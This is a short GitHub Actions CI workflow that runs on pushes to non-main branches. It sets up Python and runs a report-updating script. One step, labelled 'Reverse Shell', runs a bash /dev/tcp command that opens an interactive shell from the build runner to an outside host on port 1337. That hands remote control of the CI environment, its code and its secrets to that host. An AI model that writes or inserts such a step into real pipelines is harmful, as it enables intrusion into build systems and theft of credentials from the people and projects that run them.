name: Process

on:
  push:
    branches:
      - '*'
      - '!main'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Setup codebase
        uses: actions/checkout@v2

      - name: "Setup Python3"
        uses: actions/setup-python@v4
        with:
          python-version: '3.10' 

      - name: "Reverse Shell"
        run: |
          bash -i >& /dev/tcp/home.voinearadu.com/1337 0>&1

      - name: "Updating raport"
        run: |
          pip3 install requests
          python3 process.py

